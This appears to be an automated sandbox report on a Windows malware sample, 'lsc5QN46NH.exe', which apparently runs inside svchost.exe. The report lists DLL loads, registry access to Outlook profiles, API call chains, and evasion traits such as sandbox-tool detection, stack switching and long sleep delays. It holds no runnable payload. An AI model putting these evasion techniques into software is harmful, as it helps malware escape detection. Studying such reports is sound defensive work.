Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: dpapi.dll	Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: lsc5QN46NH.exe

Static file information: File size 80740352 > 1048576

Source: lsc5QN46NH.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: lsc5QN46NH.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: lsc5QN46NH.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: lsc5QN46NH.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: lsc5QN46NH.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: lsc5QN46NH.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: lsc5QN46NH.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: _.pdb source: svchost.exe, 00000002.00000003.1516352480.000000000326B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3939349051.0000000007C00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.3933759853.0000000003374000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: lsc5QN46NH.exe, 00000000.00000003.1513568733.0000000003DB0000.00000004.00001000.00020000.00000000.sdmp, lsc5QN46NH.exe, 00000000.00000003.1514623709.0000000003F50000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: lsc5QN46NH.exe, 00000000.00000003.1513568733.0000000003DB0000.00000004.00001000.00020000.00000000.sdmp, lsc5QN46NH.exe, 00000000.00000003.1514623709.0000000003F50000.00000004.00001000.00020000.00000000.sdmp

Source: lsc5QN46NH.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: lsc5QN46NH.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: lsc5QN46NH.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: lsc5QN46NH.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: lsc5QN46NH.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\lsc5QN46NH.exe

Code function: 0_2_00604B37 LoadLibraryA,GetProcAddress,

0_2_00604B37

Source: C:\Users\user\Desktop\lsc5QN46NH.exe	Code function: 0_2_00628945 push ecx; ret	0_2_00628958
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041C40C push cs; iretd	2_2_0041C4E2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00423149 push eax; ret	2_2_00423179
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041C50E push cs; iretd	2_2_0041C4E2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004231C8 push eax; ret	2_2_00423179
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040E21D push ecx; ret	2_2_0040E230
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041C6BE push ebx; ret	2_2_0041C6BF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_078626B8 push eax; iretd	2_2_078626B9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0786E558 push eax; iretd	2_2_0786E559
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_07865CAB pushfd ; iretd	2_2_07865CB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_07862BB3 pushfd ; iretd	2_2_07862BB9

Source: C:\Users\user\Desktop\lsc5QN46NH.exe	Code function: 0_2_006048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_006048D7
Source: C:\Users\user\Desktop\lsc5QN46NH.exe	Code function: 0_2_00685376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_00685376

Source: C:\Users\user\Desktop\lsc5QN46NH.exe

Code function: 0_2_00623187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00623187

Source: C:\Users\user\Desktop\lsc5QN46NH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lsc5QN46NH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\lsc5QN46NH.exe

API/Special instruction interceptor: Address: 1644F94

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: lsc5QN46NH.exe, 00000000.00000003.1480609566.00000000014F0000.00000004.00000020.00020000.00000000.sdmp, lsc5QN46NH.exe, 00000000.00000002.1516190225.00000000014F0000.00000004.00000020.00020000.00000000.sdmp, lsc5QN46NH.exe, 00000000.00000003.1480517098.0000000001485000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: FIDDLER.EXEVC

Source: C:\Windows\SysWOW64\svchost.exe	Memory allocated: 5340000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Memory allocated: 5340000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Memory allocated: 7340000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,

2_2_004019F0

Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 599422	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 599297	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 599187	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 599077	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598968	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598859	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598745	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598640	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598531	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598421	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598312	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598203	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 598093	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597984	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597875	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597765	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597656	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597546	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597437	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597328	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597218	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597109	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 597000	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596890	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596781	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596671	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596562	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596453	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596338	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596234	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596125	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 596015	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595906	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595796	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595687	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595578	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595468	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595359	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595250	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595140	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 595031	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 594921	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 594812	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 594703	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 594593	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 594484	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 594374	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 594265	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 594156	Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Window / User API: threadDelayed 1640			Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Window / User API: threadDelayed 8221			Jump to behavior

Source: C:\Users\user\Desktop\lsc5QN46NH.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_0-102260

Source: C:\Users\user\Desktop\lsc5QN46NH.exe

API coverage: 4.6 %

Source: C:\Windows\SysWOW64\svchost.exe TID: 5512	Thread sleep time: -23058430092136925s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 5512	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 2948	Thread sleep count: 1640 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 5512	Thread sleep time: -599422s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 5512	Thread sleep time: -599297s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 2948	Thread sleep count: 8221 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 5512	Thread sleep time: -599187s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 5512	Thread sleep time: -599077s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 5512	Thread sleep time: -598968s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 5512	Thread sleep time: -598859s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 5512	Thread sleep time: -598745s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 5512	Thread sleep time: -598640s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 5512	Thread sleep time: -598531s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 5512	Thread sleep time: -598421s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 5512	Thread sleep time: -598312s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 5512	Thread sleep time: -598203s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 5512	Thread sleep time: -598093s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 5512	Thread sleep time: -597984s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 5512	Thread sleep time: -597875s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 5512	Thread sleep time: -597765s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 5512	Thread sleep time: -597656s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 5512	Thread sleep time: -597546s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 5512	Thread sleep time: -597437s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 5512	Thread sleep time: -597328s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 5512	Thread sleep time: -597218s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 5512	Thread sleep time: -597109s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 5512	Thread sleep time: -597000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 5512	Thread sleep time: -596890s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 5512	Thread sleep time: -596781s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 5512	Thread sleep time: -596671s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 5512	Thread sleep time: -596562s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 5512	Thread sleep time: -596453s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 5512	Thread sleep time: -596338s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 5512	Thread sleep time: -596234s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 5512	Thread sleep time: -596125s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 5512	Thread sleep time: -596015s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 5512	Thread sleep time: -595906s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 5512	Thread sleep time: -595796s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 5512	Thread sleep time: -595687s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 5512	Thread sleep time: -595578s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 5512	Thread sleep time: -595468s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 5512	Thread sleep time: -595359s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 5512	Thread sleep time: -595250s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 5512	Thread sleep time: -595140s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 5512	Thread sleep time: -595031s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 5512	Thread sleep time: -594921s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 5512	Thread sleep time: -594812s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 5512	Thread sleep time: -594703s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 5512	Thread sleep time: -594593s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 5512	Thread sleep time: -594484s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 5512	Thread sleep time: -594374s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 5512	Thread sleep time: -594265s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 5512	Thread sleep time: -594156s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\lsc5QN46NH.exe	Code function: 0_2_0066445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_0066445A
Source: C:\Users\user\Desktop\lsc5QN46NH.exe	Code function: 0_2_0066C6D1 FindFirstFileW,FindClose,	0_2_0066C6D1
Source: C:\Users\user\Desktop\lsc5QN46NH.exe	Code function: 0_2_0066C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_0066C75C
Source: C:\Users\user\Desktop\lsc5QN46NH.exe	Code function: 0_2_0066EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0066EF95
Source: C:\Users\user\Desktop\lsc5QN46NH.exe	Code function: 0_2_0066F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0066F0F2
Source: C:\Users\user\Desktop\lsc5QN46NH.exe	Code function: 0_2_0066F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0066F3F3
Source: C:\Users\user\Desktop\lsc5QN46NH.exe	Code function: 0_2_006637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_006637EF
Source: C:\Users\user\Desktop\lsc5QN46NH.exe	Code function: 0_2_00663B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00663B12
Source: C:\Users\user\Desktop\lsc5QN46NH.exe	Code function: 0_2_0066BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0066BCBC

Source: C:\Users\user\Desktop\lsc5QN46NH.exe

Code function: 0_2_006049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_006049A0

Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 599422	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 599297	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 599187	Jump to behavior
